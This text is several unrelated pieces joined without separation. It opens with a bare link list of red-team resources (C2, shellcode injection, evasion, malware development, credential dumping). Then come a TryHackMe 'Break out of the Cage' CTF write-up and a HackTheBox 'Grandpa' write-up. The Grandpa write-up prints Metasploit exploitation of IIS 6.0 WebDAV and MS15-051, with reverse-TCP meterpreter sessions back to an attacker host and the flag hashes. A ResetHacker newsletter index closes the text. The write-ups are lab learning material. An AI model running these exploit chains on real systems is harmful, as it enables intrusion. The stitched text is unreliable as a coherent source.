https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/ https://www.hackingarticles.in/abusing-microsoft-outlook-365-to-capture-ntlm/ http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P4-PostExploitation.html https://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/ https://github.com/JPMinty/MindMaps https://teamhydra.blog/2020/08/25/bypassing-credential-guard/amp/ https://github.com/BankSecurity/Red_Team https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ https://gist.github.com/dogrocker/86881d2403fee138487054da82d5dc2e ### C2 https://github.com/S3cur3Th1sSh1t/WinPwn https://github.com/bats3c/shad0w https://github.com/boku7/azureOutlookC2 https://github.com/blackhatethicalhacking/HiddenEye https://github.com/blackhatethicalhacking/Dr0p1t-Framework https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/ https://github.com/nccgroup/OneLogicalMyth_Shell https://github.com/antonioCoco/ConPtyShell #### Redirectors https://github.com/Cerbersec/DomainBorrowingC2 https://github.com/mgeeky/RedWarden ### Azure / O365 recon https://github.com/nyxgeek/o365recon https://github.com/dafthack/MFASweep https://github.com/gjjw/AzCredsGDorks https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a https://medium.com/xm-cyber/privilege-escalation-and-lateral-movement-on-azure-part-1-47e128cfdc06 ### External recon https://github.com/OWASP/Amass/ https://github.com/eslam3kl/3klCon ### Phishing https://www.infosecmatter.com/solving-problems-with-office-365-email-from-godaddy/ https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/ ### Shellcode injection #### Techniques overview https://github.com/Idov31/FunctionStomping https://github.com/plackyhacker/Shellcode-Injection-Techniques https://github.com/RedTeamOperations/Advanced-Process-Injection-Workshop https://github.com/med0x2e/NET-Assembly-Inject-Remote https://github.com/mgeeky/ThreadStackSpoofer https://gist.github.com/securitytube/c956348435cc90b8e1f7 https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/ https://github.com/0xd4y/RevShell https://github.com/plackyhacker/CmdLineSpoofer #### Injectors https://github.com/plackyhacker https://github.com/boku7 https://github.com/S3cur3Th1sSh1t https://github.com/snovvcrash/DInjector https://github.com/darkr4y/geacon https://github.com/klezVirus/inceptor https://github.com/mobdk/InstallutilInject https://github.com/EnginDemirbilek/Flip https://github.com/two06/Inception https://github.com/yzddmr6/Java-Shellcode-Loader https://github.com/Flangvik/SharpDllProxy https://github.com/bats3c/DarkLoadLibrary #### Obfuscation https://github.com/xforcered/InvisibilityCloak https://github.com/ad-995/bluffy https://github.com/Paulo-D2000/ShellCodeObfuscator https://github.com/jfmaes/LazySign https://github.com/jfmaes/Invoke-DLLClone #### Defender evasion https://github.com/APTortellini/unDefender #### VBA tricks https://github.com/MartinSohn/Office-phish-templates https://github.com/sevagas/macro_pack https://s3cur3th1ssh1t.github.io/Phish-password-protected-Excel-files/ #### Powershell tricks and tools https://github.com/kmkz/exploit/blob/master/Full-payload-delivery-chain.ps1 https://github.com/InfosecMatter/Minimalistic-offensive-security-tools ### Privilege Escalation #### Linux https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ #### Windows https://github.com/S3cur3Th1sSh1t/WinPwn https://github.com/PwnDexter/SharpEDRChecker https://github.com/optiv/Registry-Recon https://github.com/411Hall/JAWS https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe https://www.blackhillsinfosec.com/digging-deeper-vulnerable-windows-services/ https://secret.club/2020/04/23/directory-deletion-shell.html https://github.com/bitsadmin/wesng https://github.com/CCob/lsarelayx https://adepts.of0x.cc/netsh-portproxy-code/ ### AD Recon https://github.com/fox-it/Invoke-ACLPwn https://github.com/S3cur3Th1sSh1t/PowerSharpPack https://outflank.nl/blog/2019/10/20/red-team-tactics-active-directory-recon-using-adsi-and-reflective-dlls/ https://github.com/mubix/netview https://github.com/lkarlslund/adalanche https://github.com/skelsec/jackdaw/ https://github.com/canix1/ADACLScanner https://github.com/ly4k/Certipy https://github.com/T-S-A/smbspider ### Persistence https://github.com/slaeryan/AQUARMOURY/ https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 https://github.com/MojtabaTajik/Robber https://github.com/zznop/drow https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/ https://www.boozallen.com/s/insight/blog/user-space-persistence-techniques-application-shims.html https://github.com/Fahrj/reverse-ssh https://github.com/snovvcrash/NimHollow https://blog.cobaltstrike.com/2021/10/29/create-a-proxy-dll-with-artifact-kit/ ### Lateral Movement https://github.com/juliourena/SharpNoPSExec https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition https://github.com/RiccardoAncarani/LiquidSnake https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/ https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/ https://www.hackingarticles.in/impacket-guide-smb-msrpc/ https://github.com/iomoath/SharpStrike https://github.com/blackarrowsec/mssqlproxy ### Creds dump https://github.com/aas-n/spraykatz https://github.com/RedCursorSecurityConsulting/PPLKiller ### Password crack https://github.com/trustedsec/hate_crack/ ### UAC Bypass https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz https://github.com/w4fz5uck5/LonelyALPC-BypassUAC https://github.com/sailay1996/UAC_Bypass_In_The_Wild https://github.com/AzAgarampur/byeintegrity8-uac ### Malware dev https://0xpat.github.io/Malware_development_part_3/ https://posts.specterops.io/offensive-p-invoke-leveraging-the-win32-api-from-managed-code-7eef4fdef16d https://jhalon.github.io/utilizing-syscalls-in-csharp-1/ https://github.com/iGh0st/gh0st3.6_src ## Clouds https://github.com/dafthack/CloudPentestCheatsheets ### AWS https://medium.com/bugbountywriteup/aws-iam-explained-for-red-and-blue-teams-2dda8b20fbf7 https://blog.appsecco.com/an-ssrf-privileged-aws-keys-and-the-capital-one-breach-4c3c2cded3af https://medium.com/bugbountywriteup/exploiting-aws-iam-permissions-for-total-cloud-compromise-a-real-world-example-part-2-2-f27e4b57454e ## AppSec https://github.com/carlospolop/hacktricks/tree/master/pentesting-web https://vdalabs.com/2020/05/08/burpsuite-extensions-some-favorites/ https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/OWASP/CheatSheetSeries/tree/master/cheatsheets https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a https://github.com/rsrdesarrollo/generator-burp-extension https://blog.secureideas.com/2019/06/better-api-penetration-testing-with-postman-part-4.html https://webassembly-security.com/fuzzing-npm-nodejs-webassembly-parsing-library-with-jsfuzz/ ### Web Scanners https://github.com/V1n1v131r4/webdiscover https://github.com/0xNanda/Oralyzer https://github.com/momenbasel/keyFinder https://github.com/fox-it/log4j-finder https://github.com/michenriksen/aquatone/tree/v1.7.0 https://github.com/Josue87/GiveMeSecrets https://github.com/jangelesg/py3webfuzz ### XSS https://github.com/nettitude/xss_payloads https://medium.com/bugbountywriteup/bypassing-waf-to-perform-xss-2d2f5a4367f3 https://medium.com/@MichaelKoczwara/password-stealing-from-https-login-page-and-csrf-bypass-with-reflected-xss-76f56ebc4516 ### Insecure deserialization https://github.com/BishopFox/rmiscout https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/ https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/ https://github.com/leechristensen/DotNetDeserializationScanner/ ### Frida https://github.com/saleemrashid/frida-sslkeylog https://blog.securelayer7.net/sharpening-your-frida-scripting-skills-with-frida-tool/ https://offsec.almond.consulting/java-tls-intercept.html ### Web Exploits https://github.com/0x0021h/expbox/blob/main/cve-2021-41349-poc.py ### Mobile https://github.com/vaib25vicky/awesome-mobile-security https://github.com/facebook/mariana-trench https://github.com/shroudedcode/apk-mitm https://github.com/xtiankisutsa/MARA_Framework https://mobisec.reyammer.io/slides https://laconicwolf.com/2019/07/21/using-burp-suite-with-android-devices/ https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/ https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born https://erev0s.com/blog/how-hook-android-native-methods-frida-noob-friendly/ https://fuzzing.science/page/fuzzing-android-native-libraries-with-libfuzzer-qemu/ https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view https://jailbreak.fce365.info/Thread-How-to-Escape-SandBox-And-Get-Root-on-iOS-12-x-once-you-ve-got-tfp0 ### Memory Bugs Exploitation https://www.shogunlab.com/blog/2019/12/22/here-be-dragons-ghidra-1.html https://github.com/atxsinn3r/VulnCases ## Protection and Hardening ### AWS https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools https://github.com/toniblyx/my-arsenal-of-aws-security-tools https://medium.com/@williambengtson/active-defense-dynamically-locking-aws-credentials-to-your-environment-47a9c920e704 https://m.youtube.com/playlist?list=PLhr1KZpdzukdeX8mQ2qO73bg6UKQHYsHb https://github.com/Voulnet/barq https://www.cloudconformity.com/knowledge-base/aws/ https://labs.nettitude.com/blog/how-to-exfiltrate-aws-ec2-data/ https://www.jeffersonfrank.com/aws-blog/best-aws-cloud-migration-tools ### Azure https://docs.microsoft.com/en-us/learn/modules/automate-azure-tasks-with-powershell/ https://github.com/Azure/securedworkstation https://docs.microsoft.com/en-gb/learn/paths/architect-great-solutions-in-azure/ ### AD https://blog.paramountdefenses.com/2020/05/active-directory-security-for-cyber-security-experts.html https://github.com/decalage2/awesome-security-hardening https://www.imab.dk/getting-started-with-security-baselines-moving-from-group-policy-to-microsoft-intune/ https://github.com/nshalabi/SysmonTools ### Windows https://github.com/littl3field/Audix https://github.com/0x6d69636b/windows_hardening https://github.com/ssh3ll/Windows-10-Hardening https://github.com/NVISO-BE/posh-dsc-windows-hardening ### Linux https://github.com/sqall01/LSMS https://github.com/hardenedlinux/harbian-audit/ https://github.com/Kirtar22/Litmus_Test/ https://gravitational.com/blog/how-to-ssh-properly/ ### Kubernetes https://www.inovex.de/blog/kubernetes-security-tools/ https://www.weave.works/blog/mitre-att-ck-matrix-for-kubernetes-tactics-techniques-explained-part-1 ### IoT https://github.com/arthastang/IoT-Implant-Toolkit https://github.com/ElevenPaths/HomePWN ## Forensics / Detection https://github.com/last-byte/PersistenceSniper https://github.com/CrowdStrike/SuperMem https://github.com/hasherezade/pe-sieve https://github.com/stuhli/awesome-event-ids https://github.com/fireeye/ThreatPursuit-VM https://github.com/cyb3rfox/Aurora-Incident-Response https://github.com/RESOLVN/RTHVM https://github.com/alexandreborges/malwoverview https://github.com/muteb/Hoarder https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/ https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 http://correlatedsecurity.com/introducing-speed-use-case-framework-v1-0/amp/ https://github.com/cyberdefenders/DetectionLabELK https://github.com/JPCERTCC/LogonTracer https://filesec.io/ http://malapi.io/ ## WriteUps https://nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone https://github.com/devanshbatham/Awesome-Bugbounty-Writeups https://www.hackingarticles.in/ctf-challenges-walkthrough/ https://hackingresources.com/hackthebox-ai-writeup/ https://rizemon.github.io/hackthebox/ldap/kerberos/windows/2020/03/22/forest-htb.html https://github.com/sajjadium/CTFium
# [Break out of the Cage](https://tryhackme.com/room/breakoutthecage1) TryHackMe Room ![Nicolas Cage](https://tryhackme-images.s3.amazonaws.com/room-icons/29ef13afaef5de5b8f1a27653f9d7a2d.jpeg) IP=`10.10.103.237` Ports ``` nmap -sV -sC -v $IP -oN initial.nmap nmap -p- -T4 -v $IP -oN all_ports.nmap 21 ftp 22 ssh 80 http ``` Checking the ftp server first; and anonymous login is enabled with a file named `dad_tasks` given. It looks like some sort of cipher matieral which I first decoded with base 64 into what appeared to be rot13 but it did not translate to anything meaningful. I tried other rotations until I decided that it may be vignere. I used this [vignere solving tool](https://www.boxentriq.com/code-breaking/vigenere-cipher) to generate a set of viable keys, after adjusting my settings to a max key length of 15 and a iteration cycle of 120, I got a key `namelesstwo`. Using that in my [CyberChef Recipe](https://gchq.github.io/CyberChef) gave me the decoded note and password Enumerating the website now with gobuster reveals very many _interesting_ directories ``` /images/ /html/ /scripts/ /contracts/ /auditions/ ``` Starting from auditions, I checked the mp3 file given and noticed a strange part in the middle where it probably has some encoded information. Throwing that into a spectogram analyser in Audacity shows me that it is the passphrase for the vignere cipher solved earlier. After roaming around the website searching for clues, I decided to login as weston into the machine using the password decoded earlier. Checking his `sudo` permissions, we have access to a `wall` binary which I try exploit via path manipulation to no avail. I then check which other users are on the machine, `cage` is one of them but I cannot view his home directory. I then search for his files on the machine which I can also view ``` find / -user cage -type f 2>/dev/null ``` Using this I then discover the python file sending wall messages using a quotes library. I notice that a random line from the file is executed without filtering it. I use this to create a reverse shell as I have write permissions to the quotes file. Now that I am logged in as _nicholas cage_ himself, I read through his emails, as there is not user flag file. Within the emails are the first flag and a strange cipher. I suspect its vigenere like the prior ones but I quickly check it through rot-ciphers, which it is not. I first tried to decrypt the cipher like before, where I got lucky, but it did not work. So I read over the email again and I was debating between two words as the key. `"Cage"` or `"Face"`. I tried `"Cage"` first and while it was mostly gibberish, it did have the word face recognisable in it... Using `"Face"` as the cipher worked and gave me root access PS: Prior to this, I did try normal PrivEsc with linpeas etc but it did not work In the root folder, we have more emails... and the root's flag! Complete! I actually enjoyed the meme-themed room more than I expected to. High recommended
# Grandpa #### 10.10.10.14 ###### Solved by: Dotaplayer365 and revdev ```{r, engine='bash', count_lines} nmap -T4 -A -v 10.10.10.14 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH |_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Server Date: Thu, 19 Oct 2017 15:38:04 GMT | WebDAV type: Unkown | Server Type: Microsoft-IIS/6.0 |_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK ``` The website shows "Under Construction" ![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Grandpa/images/Website.PNG "Website") We try visiting some webpages and we get something like this ![Alt test](https://github.com/jakobgoerke/HTB-Writeups/blob/master/Grandpa/images/index.aspx.PNG "index.aspx") Information we have so far: * IIS 6.0 Searching exploits for IIS 6.0 ```{r, engine='bash', count_lines} root@kali:~/Hackthebox/Machines/Grandpa# searchsploit IIS 6.0 | grep -v "5.0" --------------------------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms/) --------------------------------------------------------------- ---------------------------------- Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Deni | windows/dos/15167.txt Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch | windows/remote/8754.patch Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overf | windows/remote/41738.py --------------------------------------------------------------- ---------------------------------- ``` 'ScStoragePathFromUrl' exploit : >Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016. We already know from nmap that the PROPFIND request is supported. So it would'nt be a long shot to try this one out. ```{r, engine='bash', count_lines} msf > search ScStoragePathFromUrl Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow ``` _Perfect!_ So we would be using something like this ```{r, engine='bash', count_lines} Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute force Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 10.10.10.14 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.248 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 ``` And there you have it!! Easier than expected ```{r, engine='bash', count_lines} msf exploit(iis_webdav_scstoragepathfromurl) > exploit [*] Started reverse TCP handler on 10.10.14.248:4444 [*] Sending stage (171583 bytes) to 10.10.10.14 [*] Meterpreter session 1 opened (10.10.14.248:4444 -> 10.10.10.14:1036) at 2017-10-15 23:25:52 +0530 meterpreter > ``` When we try to go into the users directory, it gives us "Access Denied" Looks like Priv esc should give us both the flags. Time to go huntin. After some enumeration we see that there are a couple of processes running under NT AUTHORITY ```{r, engine='bash', count_lines} meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- ... 1172 388 inetinfo.exe 1212 388 svchost.exe 1436 1500 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 1500 388 svchost.exe 1588 388 svchost.exe 1668 1752 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 1672 388 alg.exe 1820 588 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 1992 1436 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe ... ``` Lets migrate into that process ```{r, engine='bash', count_lines} meterpreter > migrate 1820 [*] Migrating from 1668 to 1820... [*] Migration completed successfully. ``` We still get Access Denied, Time to use the exploit suggester ``` [+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. ``` After trying a few of the suggested exploits, this one worked ```{r, engine='bash', count_lines} msf exploit(ms15_051_client_copy_image) > show options Module options (exploit/windows/local/ms15_051_client_copy_image): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.248 yes The listen address LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf exploit(ms15_051_client_copy_image) > exploit [*] Started reverse TCP handler on 10.10.14.248:4443 [*] Launching notepad to host the exploit... [+] Process 2564 launched. [*] Reflectively injecting the exploit DLL into 2564... [*] Injecting exploit into 2564... [*] Exploit injected. Injecting payload into 2564... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (171583 bytes) to 10.10.10.14 [*] Meterpreter session 2 opened (10.10.14.248:4443 -> 10.10.10.14:1041) at 2017-10-15 23:36:44 +0530 meterpreter > ``` **user.txt** ```{r, engine='bash', count_lines} C:\Documents and Settings\Harry\Desktop>type user.txt type user.txt bdff5ec67c3cff017f2bedc146a5d869 ``` **root.txt** ```{r, engine='bash', count_lines} C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt 9359e905a2c35f861f6a57cecf28bb7b ```
# WEEKLY INFOSEC UPDATE : v0.7 - An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) ![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) ``` Hey Hackers, Thankyou for visiting Weekly Infosec Update.``` ![WeeklyInfosecUpdate_v0.7](https://user-images.githubusercontent.com/25515871/192681278-0cfb1d6f-c1a4-4e62-85f1-21f41724a4a0.png) <details> <summary><b>Preview</b></summary> - 1. CVE : poc exploit and analysis. - CVE Week → Day0* — Day0* Month 2022 - Security Patched - CVE: analysis & poc - CVE poc - 2. Secuirty & Researchers: AppSec, Red team, Blue team, threat intelligence, Malware, Ransomware etc - Infosec Business, funded and Market - Web Security and android security - Cloud Security - Blue/Red/Threat Intelligence Team - 3. News - DataBreach & Black Hat Hacker - Top 5 in Infosec - Twitter threads & Tips. - Hiring & Jobs - Event Recap. - Conferences - Webinars and videos - Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎: - 4. Bug Bounty : reports, Write-ups and Resources. - Hackerone/Bugcrowd REPORT - Bug bounty writeups, tips & resources - 5. Tools, framework, RAT, Ransomware and malware - SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting : * Tool - Cloud Security : * Tool - Blue/Red Team/Threat intelligence : * Tool - Reverse engineering & OSINT : * Tool - IOT, OS & Hardware : * Tool - 6. How to get involve in Contribution and contributors. - Community Engagement Partners. - Team/contributors of #WeeklyInfosecUpdate. - Resource for Weekly infosec Update. - 7. Wrapping Up. :) </details> --- # InfoSec community infused Weekly Update : ID | Weekly Issue Number | Recap Week | Issued Date | |---|---|---|---| | 09 | [Weekly Issue 10](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md) | 28 Sept 2022 - 11 October 2022 | 12 October 2022 | | 09 | [Weekly Issue 09](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md) | 21 Sept 2022 - 27 Sept 2022 | 28 Sept 2022 | | 08 | [Weekly Issue 08](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md) | 14 Sept 2022 - 20 Sept 2022 | 21 Sept 2022 | | 07 | [Weekly Issue 07](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md) | 07 Sept 2022 - 13 Sept 2022 | 14 Sept 2022 | | 06 | [Weekly Issue 06](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md) | 31st August - 06 September 2022 | 07 September 2022 | | 05 | [Weekly Issue 05](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md) | 23rd August - 30th August 2022 | 31st August 2022 | | 04 | [Weekly Issue 04](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md) | 16th August - 22nd August 2022 | 23th August 2022 | | 03 | [Weekly Issue 03](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md) | 9th August - 15th August 2022 | 16th August 2022 | | 02 | [Weekly Issue 02](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md) | 2nd August - 8th August 2022 | 9th August 2022 | | 01 | [Weekly Issue 01](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md) | 25th July - 01st August 2022 | 02 August 2022 | #### Give a STAR if Weekly InfoSec Update provide value to you. ## In the future, 1. Weekly Infosec Update • Create a website with freemium subscription model for #WeeklyInfosecUpdate. • Add more categories such as daily, Infosec Weekly, Developers Weekly and monthly Reccap. • Newsletter Service to Organization. 2. Create a public knowledge db • Make it a wiki • Crowdsorce the Content. <details> <summary><b>Preview</b></summary> Future plans detailed: 1. The final version of Weekly Infosec Update will be a website that will contain categorised content for Professional and beginners. it would be something like packetstorm, but only with useful information. There will be categories such as: • Daily infosec updates - may contain less important news, but on a daily basis • Weekly infosec updates - general weekly news • Monthly Infosec Updates - only the most important things that happened during a month • Breach news - big breaches • Critical news - news such as log4shell • New TTPs - new tactics techniques and procedures The list of categories may get bigger 2. Public knowledge DB - It would be something between mitre att&ck and an obsidian notebook. If you ever took notes while learning, you know what am i talking about. It will contain not only techniques like in mitre, but as well as POCs and explanation how it works + resources for more details. - The knowledge db will be a wiki, so anyone could contribute with their notes or blog posts. Every post will be categorised and chained like in obsidian notebook, so by reading a post, you will see many more posts related to the same subject. This way we will crowdsource our knowledge and help each other in our infosec journey 3. Offline Meeteups in City/country and support Cybersecurity project/event. 4. We're planning to start a Chapters for ResetHacker Community in different city and country so if you have expiriance with leading community, group and leaders do reach out to us at ([email protected]) and Capter name will be Eg : RH-County/City/Community/group/Team name. 5. Collebration with venue for Events. </details> #### Team/Volunteer Opportunities : <div align=""><br> <a href="mailto:[email protected]?subject=ResetHacker Community" target="_blank"><img src="https://img.shields.io/badge/Gmail-D14836?logo=gmail"></a> </div> If you want to get involved in making **Weekly Cybersecurity Update**, but aren't sure how ? CONTACT "@Attr1b" on Telegram or contact us through mail "[email protected]" <details> <summary><b>Preview</b></summary> - Wanna help our community to crowd source knowledge? - How can you contribute with us: - Help us gathering infosec news and update at the end of week. - Help us developing and/or maintaining both of our projects mentioned above. - Suggest something you would wanna see and how do you plan to improve. - We'll invite Volunteer to the Github as contributor so later you can add this project to your resume but if you think you can contribute otherwise or if you have some other idea that we can help you let me know as well. </details> #### 🤝🤝🤝 Researchers, community, groups and community engagement patners that Support Weekly Infosec Update 🤝🤝🤝 <details> <summary><b>Preview</b></summary> - Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team. - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI. - I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing "Weekly InfoSec Update" among hackers would not have been possible. - Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md). </details> #### Wrapping Up Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you. If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading! <p align="center"> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="RESETHACKER-COMMUNITY" /> </p>
